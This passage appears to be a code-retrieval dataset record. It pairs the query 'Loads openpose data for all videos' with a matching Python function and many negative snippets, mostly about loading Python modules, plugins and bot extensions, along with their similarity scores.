\"mod\"]\n except OSError:\n pass # ignore bad paths\n for eachfile in module_files:\n for eachmod in self.parse_mod(eachfile):\n self.modules[\"{0.name} ({0.version})\".format(eachmod)] = eachmod", "def mod_load(self):\n raise NotImplementedError(\"Mod load isn't overriden\")", "def get_all_modules(package):\n base = Path(inspect.getabsfile(package)).parent\n\n for fl in base.glob(\"*.py\"):\n print(f\"loading module {fl}\")\n yield load_module(fl)", "def load_sources(self):\n self.pymodule = imp.load_source(self.name, self.path)", "def load_conf_modules():\n for modname in _list_module_names():\n mod = 
importutils.import_module('monasca_api.conf.' + modname)\n required_funcs = ['register_opts', 'list_opts']\n for func in required_funcs:\n if hasattr(mod, func):\n yield mod", "def run_load(rootpath):\n global CSV_PATH\n CSV_PATH = rootpath+'/csv_files/'\n load_movies_details()\n load_movies_cast()\n load_movies_reviews()", "def import_all():\n import theory", "def loadPlugins():\n sys.path.append(basedefs.DIR_PLUGINS)\n fileList = sorted(os.listdir(basedefs.DIR_PLUGINS), cmp=plugin_compare)\n for item in fileList:\n # Looking for files that end with ###.py, example: a_plugin_100.py\n match = re.search(\"^(.+\\_\\d\\d\\d)\\.py$\", item)\n if match:\n try:\n moduleToLoad = match.group(1)\n logging.debug(\"importing module %s, from file %s\", moduleToLoad, item)\n moduleobj = __import__(moduleToLoad)\n moduleobj.__file__ = os.path.join(basedefs.DIR_PLUGINS, item)\n globals()[moduleToLoad] = moduleobj\n checkPlugin(moduleobj)\n controller.addPlugin(moduleobj)\n except:\n logging.error(\"Failed to load plugin from file %s\", item)\n logging.error(traceback.format_exc())\n raise Exception(\"Failed to load plugin from file %s\" % item)", "def dispatch_load(self):\n\n for node in self.nodes:\n threading.Thread(target=self.__start_load, args=(node,)).start()", "def import_all():\n import sys\n\n # obviously this is a hack for now... What's the right way to learn\n # the directory that holds the plugins directory? I don't want the\n # directory itself, because I *think* we might get name conflicts if we\n # import them directly. (I'm fuzzy about how that works. Can you\n # import \"x\" from one path and \"x\" from another path, and have them both\n # around with the same name? sys.modules suggests no.\n pdir = \"/home/sandro/riftr\"\n sys.path.append(pdir)\n \n dir = \"plugins\"\n ids = {}\n for filename in os.listdir(pdir + \"/\" + dir):\n if filename.endswith(\".py\") and not filename[0] == \"_\":\n local = filename[0:-3]\n module_name = dir + \".\" + local\n #print \n #print module_name\n m = __import__(module_name)\n mm = getattr(m, local)\n #print \"=> \", mm\n for (name, entry) in mm.__dict__.items():\n if getattr(entry, \"__doc__\", False) and getattr(entry, \"id\", False):\n if entry.id.startswith(dir+\".\"):\n # because they used \"__name__\"\n entry.id = entry.id[len(dir+\".\"):]\n if entry.id in ids:\n raise RuntimeError, (\"Duplicate id: %s used in %s and %s\" %\n entry.id, ids[entry.id], filename)\n ids[entry.id] = filename\n #print \"registering\", name, entry\n register(entry)\n \n # I wonder why issubclass doesn't work for me like this.\n #if type(entry).__name__ in [ \"classobj\", \"type\" ]:\n # print \"is type/class\", name, entry\n # print issubclass(entry, object)\n # print issubclass(entry, Plugin)\n # print issubclass(entry, InputPlugin)\n\n\n sys.path.pop(-1)", "def command_load(interface,command,args):\n try:\n modules.add_module(args)\n interface.reply(\"Loaded %s\"%args)\n except ImportError, e:\n interface.reply(str(e))\n except modules.ModuleAlreadyLoaded, e:\n interface.reply(str(e))", "def list_modules():\n for module_name in listdir(modules_directory):\n if isdir(join(modules_directory, module_name)):\n log.debug('Load module: {0}'.format(module_name))\n yield module_name", "def load_module(cls, *args, **kwargs): # real signature unknown\n pass", "def load_module(cls, *args, **kwargs): # real signature unknown\n pass", "def load_module(cls, *args, **kwargs): # real signature unknown\n pass", "def import_all_handlers(self):\n import os\n exclude_list=[\"base\"]\n\n 
#\n # the list of handlers (excluding base. Add more you dont want\n # to be loaded or inspected to exclude_list above.)\n #\n mods=[]\n module_path = os.path.abspath(os.path.join(os.path.dirname( __file__ ), 'handlers'))\n #print(\"importing handlers from: \" + module_path)\n for mod in os.listdir( module_path ):\n mod = mod.split(\".\")[0]\n if not mod.startswith(\"_\") and not mod in exclude_list:\n #print(\" now processing: \" + str(mod))\n mods.append(mod)\n \n #print(\"mods: \" + str(mods))\n class_list = []\n # load all the models from their modules (mods)\n #print(str(mods))\n import importlib\n for m in mods:\n #print(\"importing: \" + 'pow_comments.handlers.' + m) \n try:\n mod = importlib.import_module('pow_comments.handlers.' + m)\n except:\n pass\n #print(dir(mod))", "def load_sections():\n pass", "def load_plugins(self):\n self.__doing('load_plugins')\n self.__do_if_not_done('bootstrap')\n if self.env.mode in ('dummy', 'unit_test'):\n return\n for package in self.packages:\n self.add_package(package)", "def load_plugins():\n\timport imp\n\tglobal plugins\n\n\t# import plugins\n\ti = 1\n\tfor dirname, dirnames, filenames in os.walk(PLUGINS_PATH):\n\t\tfor filename in filenames:\n\t\t\tif filename.startswith(\"plugin-\") and filename.endswith(\".py\"):\n\t\t\t\t# print \"Loading plugin:\", filename\n\t\t\t\tload_path = os.path.join(dirname, filename)\n\t\t\t\tmodule = imp.load_source(\"plugin%s\" % i, load_path)\n\n\t# init each plugin\n\tplugins = LinksProvider.get_plugins()", "def _import_all_modules():\n import inspect\n import os\n\n all_objects = []\n globals_, locals_ = globals(), locals()\n\n # dynamically import all the package modules\n modules = set()\n json_files = set()\n for filename in os.listdir(os.path.dirname(__file__)):\n # process all python files in directory that don't start with underscore\n # (which also keeps this module from importing itself)\n modulename, ext = os.path.splitext(filename)\n if filename[0] != \"_\":\n if ext == \".py\":\n modules.add(modulename)\n elif ext == \".json\":\n json_files.add(filename)\n\n old_length = len(modules) + 1\n errors = {}\n while len(modules) and old_length > len(modules):\n old_length = len(modules)\n for modulename in modules.copy():\n package_module = \".\".join([__name__, modulename])\n try:\n module = __import__(package_module, globals_, locals_, [modulename])\n except ModuleNotFoundError as err:\n raise err\n except ImportError as err:\n errors[modulename] = repr(err)\n continue\n\n # Only the class with the same name as the file will be imported\n found_class = False\n for obj_name in filter(lambda name: name[0] != \"_\", module.__dict__):\n found_class = modulename.lower() == obj_name.lower()\n obj = module.__dict__[obj_name]\n if found_class and inspect.isclass(\n obj\n ): # Check that the object found is a class\n globals_[obj_name] = module.__dict__[obj_name]\n all_objects.append(obj_name)\n break\n\n if not found_class:\n logger.warning(\n \"File {}.py does not contain a class named {}. 
The file will be ignored.\"\n \"\".format(package_module, modulename)\n )\n\n modules.discard(modulename) # Remove module from the available list\n\n if modules:\n logger.warning(\"Failed to import from {} modules {}.\".format(__name__, modules))\n for modulename in modules:\n logger.debug(\"{}: {}\".format(modulename, errors[modulename]))\n\n from cosapp.systems import System\n from jsonschema import ValidationError\n\n def systemFactory(name: str, filename: str) -> System:\n obj = System.load(filename)\n obj.name = name\n return obj\n\n for json_file in json_files: # Fake class behavior for System JSON file\n try:\n tmp_system = System.load(json_file)\n except (TypeError, AttributeError, ValidationError):\n logger.warning(\n 'JSON file \"{}\" does not defined a CoSApp System.'.format(json_file)\n )\n else:\n obj_name = tmp_system.name.capitalize()\n globals_[obj_name] = lambda name: systemFactory(name, json_file)\n all_objects.append(obj_name)\n\n return all_objects", "async def reload_modules(self) -> bool:\n self.reloading_modules = True\n newmodules = await self.detect_modules()\n todrop = []\n toload = []\n\n # Logs!\n errors = False\n\n for name, module in self.modules.items():\n if module.loaded:\n if hasattr(module.module, \"unload\"):\n try:\n await module.module.unload(self.client.loop)\n except:\n LOGGER.exception(\n f\"Hit an exception while unloading module {name}.\")\n errors = True\n\n if name not in newmodules:\n LOGGER.debug(f\"Dropping removed module {name}.\")\n if hasattr(module.module, \"shutdown\"):\n try:\n await module.module.shutdown(self.client.loop)\n except:\n LOGGER.exception(\n f\"Hit an exception while shutting down module {name}.\")\n errors = True\n\n todrop.append(module)\n continue\n\n newmodules.remove(name)\n module.handlers = {}\n try:\n importlib.reload(module.module)\n\n except:\n LOGGER.exception(\n f\"Hit an exception while reloading module {name}.\")\n todrop.append(module)\n errors = True\n continue\n\n toload.append(module)\n module.loaded = True\n\n # Loops over NEW modules. 
Because we can't just reload them.\n for name in newmodules:\n newmod = MModule(name)\n self.modules[name] = newmod\n\n try:\n mod = importlib.import_module(name)\n except:\n LOGGER.exception(\n f\"Hit an exception while loading module {name}.\")\n # Alas it was not meant to be.\n del self.modules[name]\n errors = True\n continue\n\n newmod.module = mod\n toload.append(newmod)\n\n newmod.loaded = True\n for server in self.servers.values():\n server.modules[name] = newmod\n #LOGGER.info(f\"$BLUESuccessfully loaded module $WHITE{name}$BLUE.\")\n\n for module in toload:\n if hasattr(module.module, \"load\"):\n try:\n await module.module.load(self.client.loop)\n\n except:\n LOGGER.exception(\n f\"Hit an exception while load()ing module {module.name}.\")\n errors = True\n\n for module in todrop:\n for server in self.servers.values():\n if module.name in server.modules:\n del server.modules[module.name]\n\n del self.modules[module.name]\n\n self.reloading_modules = False\n\n for handler in self.temp_module_handlers:\n try:\n if handler.module in self.modules:\n self.register_handler(handler)\n\n else:\n LOGGER.warning(f\"Attempted to late-register for nonexistant module: {handler.module}/{handler.name}\")\n\n except:\n LOGGER.exception(\n f\"Exception while registering handler {handler.module}/{handler.name}!\")\n errors = True\n\n self.temp_module_handlers = []\n\n return errors", "def __load_cogs(self):\n for cog in self.__cogs.get():\n logging.info('loading %s', cog)\n self.load_extension(cog)", "def _load(self, directory):\n pass", "def load_tab(self, load_dir):\n conf = os.path.join(load_dir, 'conf', 'config_rec')\n self.load_tab_common(conf)", "def load_extensions(self):\n extension_module_name = f\"{utils.get_project_name()}.cogs\"\n for extension in CONF.LOADED_EXTENSIONS:\n try:\n self.load_extension(extension_module_name + \".\" + extension)\n LOG.debug(f\"The extension '{extension.split('.')[0]}' has been successfully loaded\")\n except Exception as e:\n message = f\"Failed to load extension '{extension.split('.')[0]}'\"\n LOG.exception(log.get_log_exception_message(message, e))", "def load_sub_modules(module):\n for loader, name, is_pkg in pkgutil.walk_packages(module.__path__):\n if '.' 
in name:\n continue\n\n import_module(f'{module.__name__}.{name}')", "def reload_all(from_load_path=True, keep_parameters=True):\n if keep_parameters:\n old_par=par[\"\"].as_dict(\"flat\")\n if from_load_path:\n cur_dir=os.path.abspath(os.curdir)\n os.chdir(_load_path)\n try:\n module_utils.reload_package_modules(__name__)\n finally:\n os.chdir(cur_dir)\n else:\n module_utils.reload_package_modules(__name__)\n par.refresh()\n if keep_parameters:\n for k,v in old_par.items():\n try:\n par[k]=v\n except KeyError:\n pass", "def load(self):\n self._really_load()", "def parse_modules(self) -> None:\n mods: Dict[str, str] = {}\n matches = self.find_dir(\"LoadModule\")\n iterator = iter(matches)\n # Make sure prev_size != cur_size for do: while: iteration\n prev_size = -1\n\n while len(mods) != prev_size:\n prev_size = len(mods)\n\n for match_name, match_filename in zip(\n iterator, iterator):\n mod_name = self.get_arg(match_name)\n mod_filename = self.get_arg(match_filename)\n if mod_name and mod_filename:\n mods[mod_name] = mod_filename\n mods[os.path.basename(mod_filename)[:-2] + \"c\"] = mod_filename\n else:\n logger.debug(\"Could not read LoadModule directive from Augeas path: %s\",\n match_name[6:])\n self.modules.update(mods)", "def force_load(self):\n pass", "def load_modules(self, filepaths):\n # removes filepaths from processed if they are not in sys.modules\n self._update_loaded_modules()\n filepaths = util.return_set(filepaths)\n\n modules = []\n for filepath in filepaths:\n filepath = self._clean_filepath(filepath)\n # check to see if already processed and move onto next if so\n if self._processed_filepath(filepath):\n continue\n\n module_name = util.get_module_name(filepath)\n plugin_module_name = util.create_unique_module_name(module_name)\n\n try:\n module = load_source(plugin_module_name, filepath)\n # Catch all exceptions b/c loader will return errors\n # within the code itself, such as Syntax, NameErrors, etc.\n except Exception:\n exc_info = sys.exc_info()\n self._log.error(msg=self._error_string.format(filepath),\n exc_info=exc_info)\n continue\n\n self.loaded_modules.add(module.__name__)\n modules.append(module)\n self.processed_filepaths[module.__name__] = filepath\n\n return modules", "def loaded_modules() -> List[str]:\n return PYSTAC_IO.keys()", "def load(path, reset=False):\n pass", "def load_app_modules(apps, submodules):\n for app in apps:\n mod = import_module(app)\n for submodule in submodules:\n import_submodule(mod, app, submodule)", "def load(name):\n return []", "def do_load(self, name):\n try:\n self.runner.run()\n\n except():\n print('Loading failed')", "def load(app: Flask):\n from . import user\n from . 
import game", "def loadInputFiles(self):\n\t\tfor filename in self.input_filename_list:\n\t\t\tfor module in self.modules:\n\t\t\t\tmodule.Add(filename)", "def _setup_modules(self):\r\n module_registry = AppModule.module_registry()\r\n for bundle in topological_sort(AppModule.module_dependencies()):\r\n for module_label in bundle:\r\n assert module_label in module_registry\r\n module = module_registry[module_label]\r\n self._debug_log('Initializing: %s (%s)' % (module.label(), module.description()))\r\n try:\r\n module.setup_function()\r\n except AppModule.Unimplemented:\r\n pass\r\n self._init_modules.append(module.label())", "def _load_objects():\n global DataArray, DataFrame, Series, Index, ndarray\n ndarray = np.ndarray\n DataArray = getattr(sys.modules.get('xarray', None), 'DataArray', ndarray)\n DataFrame = getattr(sys.modules.get('pandas', None), 'DataFrame', ndarray)\n Series = getattr(sys.modules.get('pandas', None), 'Series', ndarray)\n Index = getattr(sys.modules.get('pandas', None), 'Index', ndarray)", "def import_all():\n\n # count the number of files loaded\n count = 0\n\n # get model name\n model_name_list = [model for data_models in settings.OBJECT_DATA_MODELS\n for model in data_models]\n\n model_name_list += [model for model in settings.OTHER_DATA_MODELS]\n\n # import models one by one\n for model_name in model_name_list:\n import_model(model_name)\n\n # import localized strings\n import_localized_strings(settings.LANGUAGE_CODE)", "def run_loaded_modules(self, module_ignore_errors=False, verbosity=2):\n if len(self._loaded_modules) == 0:\n logger.info(\"No loaded task.\")\n return {}\n\n previous_frame = inspect.currentframe().f_back\n caller_info = inspect.getframeinfo(previous_frame)\n\n loaded_modules = copy.deepcopy(self._loaded_modules)\n self.clear_loaded_modules()\n self._log_modules(caller_info, self._loaded_modules, verbosity)\n\n tasks = [\n self.build_task(**module) for module in loaded_modules\n ]\n results = self.run_tasks(self.host_pattern, self.loader, self.im, self.vm, self.options, tasks=tasks)\n\n self._log_results(caller_info, loaded_modules, results, verbosity)\n self._check_results(caller_info, loaded_modules, results, module_ignore_errors, verbosity)\n\n return results", "def _get_modules(self, names):\n loaded_modules = []\n for name in names:\n loaded_modules.append(sys.modules[name])\n return loaded_modules", "def load_plugins(self) -> None:\n import importlib\n import pkgutil\n import stactools\n\n # From https://packaging.python.org/guides/creating-and-discovering-plugins/#using-namespace-packages # noqa\n def iter_namespace(ns_pkg: ModuleType) -> Iterator[ModuleInfo]:\n # Specifying the second argument (prefix) to iter_modules makes the\n # returned name an absolute name instead of a relative one. 
This allows\n # import_module to work without having to do additional modification to\n # the name.\n return pkgutil.iter_modules(\n ns_pkg.__path__, # type: ignore # mypy issue #1422\n ns_pkg.__name__ + '.')\n\n discovered_plugins = {\n name: importlib.import_module(name)\n for finder, name, ispkg in iter_namespace(stactools)\n }\n\n for name, module in discovered_plugins.items():\n register_plugin = getattr(module, 'register_plugin', None)\n if register_plugin:\n register_plugin(self)", "def load_cogs(self):\n\n path = \"cogs/\" # Should always have a trailing slash\n import_path = path.replace(\"/\", \".\")\n extensions: list[str] = [\n import_path + file.replace(\".py\", \"\")\n for file in os.listdir(path)\n if os.path.isfile(f\"{path}{file}\")\n ]\n\n for extension in extensions:\n try:\n self.load_extension(extension)\n except errors.ExtensionAlreadyLoaded:\n pass\n\n log.info(f\"Loaded {len(self.commands)} commands from {len(self.cogs)} cogs\")", "def load_kernel_modules():\n if not os.path.isdir(W1ThermSensor.BASE_DIRECTORY):\n os.system(\"modprobe w1-gpio >/dev/null 2>&1\")\n os.system(\"modprobe w1-therm >/dev/null 2>&1\")\n\n for _ in range(W1ThermSensor.RETRY_ATTEMPTS):\n if os.path.isdir(\n W1ThermSensor.BASE_DIRECTORY\n ): # w1 therm modules loaded correctly\n break\n time.sleep(W1ThermSensor.RETRY_DELAY_SECONDS)\n else:\n raise KernelModuleLoadError()", "async def reload_all(ctx):\n await ext_manager.reload_all()\n await ctx.send(\"Successfully reloaded.\")", "def load(self, start=False):\n self.load_networks(start=start)\n self.load_machines(start=start)", "def import_all_model_modules():\r\n import brokerage.model\r\n # ensure that these imports don't get auto-deleted! they have side effects.\r\n brokerage.model", "def __setup_modules(self, config, db, rcontext):\n DEPTH_ROOT = 0\n DEPTH_TYPE = 1\n DEPTH_SUBTYPE = 2\n\n for root, sub_folders, files in os.walk(\"modules\"):\n nicepath = os.path.relpath(root, \"modules\")\n fullpath = root\n\n if nicepath == '.':\n depth = DEPTH_ROOT\n else:\n depth = nicepath.count(os.path.sep) + 1\n\n if depth > DEPTH_SUBTYPE:\n warnings.warn(\"sub-subdirectory in module (%s) \\\n ignored.\" % nicepath)\n\n modulenamebase = nicepath.replace(os.path.sep, '.')\n mimetype = nicepath.replace(os.path.sep, '/')\n\n if depth != DEPTH_ROOT:\n # Each folder should except root have an __init__.py,\n # otherwise the directory name be assigned as a module.\n if not \"__init__.py\" in files:\n warnings.warn(\"__init__.py not found in \\\n module folder '%s'.\" % nicepath)\n continue\n\n modulepath = fullpath + os.path.sep + \"__init__.py\"\n module = Module(modulepath, modulenamebase, mimetype)\n self.modules.append(module)\n\n # Now load each handler .py file\n for file in files:\n modulenameend, extension = os.path.splitext(file)\n if extension.lower() == \".py\":\n is_init = file == \"__init__.py\"\n modulepath = fullpath + os.path.sep + file\n modulename = None\n if is_init:\n modulename = modulenamebase\n elif depth == DEPTH_ROOT:\n modulename = modulenameend\n else:\n modulename = modulenamebase + '.' 
+ modulenameend\n\n module = Module(modulepath, modulename, mimetype,\n is_global=(depth == DEPTH_ROOT),\n as_mime_handler=not is_init)\n if module.is_mime_handler and not rcontext.is_recursive:\n db.setup_module_table(module.md5_tablename,\n module.columndefinition)\n\n self.modules.append(module)", "def load(bot, feature) :\n try :\n f = sys.modules[feature]\n\n except KeyError :\n f = False\n\n if f :\n imp.reload(f)\n initalize(bot, f)\n\n else :\n f = importlib.import_module(\"mandelbot.features.\" + feature)\n initalize(bot, f)\n sys.modules[feature] = f", "def load_all_plugins(self, paths, disabled=None):\n # Load plugins declared by setuptools entry points\n self.load_setuptools_entrypoints(hookspecs.hookspec.project_name)\n\n plugins = []\n for path in paths:\n plugin = load_module(path)\n if plugin:\n LOGGER.debug(\"Plugin found at '%s'\", path)\n plugins.append(plugin)\n\n plugins += [LightsPlugin(self), # Last called\n ViewPlugin(self),\n PrinterPlugin(self),\n PicturePlugin(self),\n CameraPlugin(self)] # First called\n\n for plugin in plugins:\n self.register(plugin, name=getattr(plugin, 'name', None))\n\n # Check that each hookimpl is defined in the hookspec\n # except for hookimpl with kwarg 'optionalhook=True'.\n self.check_pending()\n\n # Disable unwanted plugins\n if disabled:\n for name in disabled:\n self.unregister(name=name)", "def reload(self):\n self.rpc.call(MsfRpcMethod.CoreReloadModules)", "def load_all_packages():\n\n package_dict = dict((n, load_component_by_name(n))\n for n in list_packages())\n\n return package_dict", "def load(path):\n pass", "async def load_all_extensions(self, reload=False):\n succeeded = {}\n for extension in get_extensions():\n try:\n if reload or extension not in self.cogs_loaded:\n self.load_extension(f'cogs.{extension}')\n l.info(f\"Loaded extension '{extension}'\")\n self.cogs_loaded.add(extension)\n succeeded[extension] = True\n except Exception as e:\n error = f\"{extension}\\n {type(e).__name__} : {e}\"\n l.error(f\"Failed to load extension '{error}'\")\n succeeded[extension] = False\n if succeeded:\n l.info(LOG_SEP)\n return succeeded", "def unload_all():\n module_utils.unload_package_modules(__name__)", "def _update_loaded_modules(self):\n system_modules = sys.modules.keys()\n for module in list(self.loaded_modules):\n if module not in system_modules:\n self.processed_filepaths.pop(module)\n self.loaded_modules.remove(module)", "def reload():\n import cubegame\n importlib.reload(cubegame)\n exec(\"from cubegame import *\")", "def preload_modules(context: multiprocessing.context.BaseContext) -> None:\n all_loaded_modules = sys.modules.keys()\n preload = [\n loaded_module for loaded_module in all_loaded_modules\n if loaded_module.split('.')[0] in (\n 'smac',\n 'autoPyTorch',\n 'numpy',\n 'scipy',\n 'pandas',\n 'pynisher',\n 'sklearn',\n 'ConfigSpace',\n 'torch',\n 'torchvision',\n 'tensorboard',\n 'imgaug',\n 'catboost',\n 'lightgbm',\n ) and 'logging' not in loaded_module\n ]\n context.set_forkserver_preload(preload)", "def load(self):\n\n\t\tif self.module is None:\n\t\t\t# Cause the interpreter to load the module in local namespace ...\n\t\t\texec \"import \" + self.name\n\n\t\t\t# Store the module object ...\n\t\t\tobject.__setattr__(self, 'module', eval(self.name))", "def framework_load_weights(self):\n omit_modules = cfg.get('omit_modules_from_loading', [])\n\n for dest_module_path, path in self.get_load_paths():\n _print(\"Loading submodule \\\"{}\\\" from {}.\".format(dest_module_path, path))\n\n if \":\" in path:\n 
source_module_path, source_path = path.split(':')\n else:\n source_path = path\n source_module_path = dest_module_path\n\n start = time.time()\n\n device = get_pytorch_device()\n\n loaded_state_dict = torch.load(source_path, map_location=device)['model']\n\n if source_module_path:\n source_module_path_with_sep = source_module_path + '.'\n\n loaded_state_dict = type(loaded_state_dict)(\n {k: v for k, v in loaded_state_dict.items() if k.startswith(source_module_path_with_sep)}\n )\n\n assert loaded_state_dict, (\n f\"File contains no tensors with prefix `{source_module_path_with_sep}` (file: {source_path})\"\n )\n\n if dest_module_path != source_module_path:\n # Rename variables from the loaded state dict by replacing `source_module_path` with `dest_module_path`.\n\n _source_module_path = source_module_path + '.' if source_module_path else source_module_path\n _dest_module_path = dest_module_path + '.' if dest_module_path else dest_module_path\n\n loaded_state_dict = {\n k.replace(_source_module_path, _dest_module_path, 1): v\n for k, v in loaded_state_dict.items()\n }\n\n module = self.updater.model\n\n state_dict = module.state_dict()\n\n intersection = set(state_dict.keys()) & set(loaded_state_dict.keys())\n\n if not intersection:\n raise Exception(\n f\"Loading variables with spec ({dest_module_path}, {path}) \"\n f\"would have no effect (no variables found).\"\n )\n loaded_state_dict = {k: loaded_state_dict[k] for k in intersection}\n\n if omit_modules:\n omitted_variables = {\n k: v for k, v in loaded_state_dict.items()\n if any(k.startswith(o) for o in omit_modules)\n }\n\n print(\"Omitting the following variables from loading:\")\n describe_structure(omitted_variables)\n\n loaded_state_dict = {\n k: v for k, v in loaded_state_dict.items()\n if k not in omitted_variables\n }\n\n _print(\"Loading variables:\")\n describe_structure(loaded_state_dict)\n\n state_dict.update(loaded_state_dict)\n\n module.load_state_dict(state_dict, strict=True)\n\n _print(\"Done loading weights for module {}, took {} seconds.\".format(dest_module_path, time.time() - start))", "def load_all_files(self):\n\t\tself.get_rankings()\n\t\tself.get_partition()\n\t\tself.__load_factors()\n\t\tself.get_document_associations()\n\t\tself.get_term_associations()", "def collectPlugins(self):\n\t\tself.locatePlugins()\n\t\tself.loadPlugins()", "async def load_all_extensions(self):\n await self.wait_until_ready()\n await asyncio.sleep(1)\n\n cogs = [\"cogs.member\",\n \"cogs.officer\",\n \"cogs.rolemanager\",\n \"cogs.database\",\n \"cogs.everyone\",\n \"cogs.nodewar\",\n \"cogs.twitch\"]\n\n for extension in cogs:\n try:\n self.load_extension(extension)\n print(f'loaded {extension}')\n except Exception as e:\n error = f'{extension}\\n {type(e).__name__} : {e}'\n print(f'failed to load extension {error}')\n print('-' * 10)\n\n for guild in self.guilds:\n if not discord.utils.get(guild.roles, name=self.manager_role):\n await self.create_bot_manager(guild)\n\n print(f\"\\nUsername: {self.user}\\nID: {self.user.id}\")", "def load_variables(mod):\n for k in dir(mod):\n if '__' not in k:\n globals()[k] = getattr(mod, k)", "def on_modules_command(sender, command, label, args):\n plugin_header(sender, \"Modules\")\n msg(sender, \", \".join([((\"&a\" if mod in shared[\"modules\"] else \"&c\") + mod) for mod in shared[\"load_modules\"]]))", "def load(self):\n for name, item in itertools.chain(\n self._cal_objs.items(),\n self._noise_objs.items()):\n logger.debug(\"load {}\".format(item))\n item.load()", "def load(self, *args, 
**kw):\n if self._loaded:\n return\n args = args or self._loader[1]\n kw = kw or self._loader[2]\n loaded_models = self._loader[0](*args, **kw)\n for m in loaded_models:\n if isinstance(m, Model):\n self.add(m)\n else:\n self.add(self.model_class(**m))\n self._loaded = True", "def preload_all_configs(self):\n for _, _, filenames in os.walk(self.configDir):\n for filename in filenames:\n if filename[-3:] == \".py\" and filename != \"__init__.py\":\n configID = filename[0:-3]\n self.load_config(configID)" ]
[ "0.7162257", "0.677256", "0.6646025", "0.6645682", "0.6506407", "0.6479407", "0.6455077", "0.6443325", "0.6390843", "0.6241457", "0.623022", "0.62124735", "0.62108576", "0.62056154", "0.6129464", "0.61284095", "0.6105363", "0.60891134", "0.6054746", "0.60284793", "0.60165846", "0.5982475", "0.5981576", "0.59678525", "0.58912235", "0.5861728", "0.5852702", "0.58458567", "0.5823609", "0.581714", "0.5812449", "0.58078676", "0.580431", "0.57699317", "0.57577324", "0.5743973", "0.5736027", "0.5734533", "0.57317036", "0.57230103", "0.57168794", "0.57147264", "0.5713593", "0.5713593", "0.5713593", "0.5712001", "0.5680126", "0.5663111", "0.56576914", "0.56358504", "0.5635713", "0.5611403", "0.5599475", "0.5595817", "0.5595503", "0.55678505", "0.556357", "0.5552053", "0.5531546", "0.55075914", "0.550313", "0.5502088", "0.55005485", "0.5498815", "0.54967356", "0.54868984", "0.54863364", "0.5483802", "0.5483117", "0.54820436", "0.5471908", "0.54641914", "0.5460909", "0.54576623", "0.54531467", "0.54444873", "0.54401815", "0.54369813", "0.54343736", "0.5429556", "0.54245317", "0.54236597", "0.5412694", "0.5412209", "0.54115516", "0.5408448", "0.5406462", "0.54050976", "0.5402328", "0.5397826", "0.53957856", "0.5389717", "0.53886455", "0.53761876", "0.53745246", "0.5359319", "0.53324115", "0.53230286", "0.53222626", "0.53201234" ]
0.6359435
9
Loads openpose data for all videos.
def load_op_data_all(json_dirs, video_metadata_intel): frame_list_all_videos = [] for path_to_json, vm in zip(json_dirs, video_metadata_intel): frame_list_all_videos.append(load_op_data(path_to_json, vm)) return frame_list_all_videos
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def load_video_data(self):\n self.file_videos = [\n Video.from_file(path, self)\n for path in self.video_dir.glob('*.json')\n ]", "def loadData(catalog):\n loadVideos(catalog)", "def load_videos(self):\n logging.debug(\"Loading videos data...\")\n\n # loading videos\n data=requests.get(self.__URL_VIDEOS)\n self.__dataframe_videos=pd.DataFrame(data.json())\n # XXX transposing as the API returns a pre index list of videos\n self.__dataframe_videos = self.__dataframe_videos.transpose()\n if self.__save_raw_data_to_csv:\n logging.debug(\"Saving raw data to CSV [%s...\" % self.__RAW_DATA_FILENAME)\n self.__dataframe_videos.to_csv(self.__RAW_DATA_FILENAME, encoding='utf-8', sep=',', index=False)\n self.__dataframe_videos['video_contents'] = self.__dataframe_videos[['video_title', 'video_desc']].\\\n apply(lambda x: \" \".join(x), axis=1)\n\n logging.debug(\"Informative videos data loaded! n=%s\" % self.__dataframe_videos.shape[0])\n\n return self.__dataframe_videos", "def _loadData(self, data):\n Movie._loadData(self, data)\n PlexSession._loadData(self, data)", "def _loadData(self, data):\n Movie._loadData(self, data)\n PlexHistory._loadData(self, data)", "def _loadData(self, data):\n Episode._loadData(self, data)\n PlexSession._loadData(self, data)", "def load_pycon_data(pycon_videos=pycon_videos):\r\n with open(pycon_videos, 'rb') as fd:\r\n return pickle.load(fd)", "def load_pycon_data(pycon_videos: str):\n p_data = None\n with open(pycon_videos, 'rb') as pickle_file:\n p_data = pickle.load(pickle_file)\n return p_data", "def _load_data(self, cfg):\n # Load frame trajectories\n if self.cfg.MODEL.USE_TRAJECTORIES:\n if cfg.VIDOR.TEST_DEBUG:\n print('Loading trajectories...')\n with open(os.path.join(cfg.VIDOR.ANNOTATION_DIR, self.trajectories_path), 'r') as f:\n self._trajectories = json.load(f)\n\n # Load human pose features (theta; 72 points)\n if self.cfg.MODEL.USE_HUMAN_POSES:\n if cfg.VIDOR.TEST_DEBUG:\n print('Loading human poses...')\n import pickle\n with open(os.path.join(cfg.VIDOR.ANNOTATION_DIR, self.human_poses_path), 'rb') as f:\n self._human_poses = pickle.load(f)\n elif self.cfg.MODEL.USE_SPA_CONF:\n if cfg.VIDOR.TEST_DEBUG:\n print('Loading human poses for spatial configuration module...')\n self._human_poses_root = os.path.join(cfg.VIDOR.ANNOTATION_DIR, self.human_poses_path)\n\n # Loading frame paths.\n (\n self._image_paths,\n self._video_idx_to_name,\n ) = vidor_helper.load_image_lists(cfg, is_train=(self._split == \"train\"))\n\n # Loading annotations for boxes and labels.\n self._instances = vidor_helper.load_boxes_and_labels(\n cfg, mode=self._split\n )\n\n # Get indices of keyframes and corresponding boxes and labels.\n (\n self._keyframe_indices,\n self._keyframe_boxes_and_labels,\n ) = vidor_helper.get_keyframe_data(cfg, self._instances, mode=self._split)\n\n # import pdb; pdb.set_trace()\n\n # Calculate the number of used boxes.\n self._num_boxes_used = vidor_helper.get_num_boxes_used(\n self._keyframe_indices, self._keyframe_boxes_and_labels\n )\n\n self.print_summary()\n\n def debug(idx):\n pass\n\n if cfg.VIDOR.TEST_DEBUG:\n debug(0)\n # pass", "def load_video_data(fpath):\n videos = []\n with open(fpath) as f:\n d1 = json.load(f)['items']\n videos += append_videos(d1)\n return videos", "def save_video_data(self):\n if self.overwrite:\n # Erase old event videos\n for path in self.video_dir.glob('*.json'):\n path.unlink()\n for video in self.videos:\n video.save()", "def _loadData(self, data):\n Episode._loadData(self, data)\n PlexHistory._loadData(self, data)", 
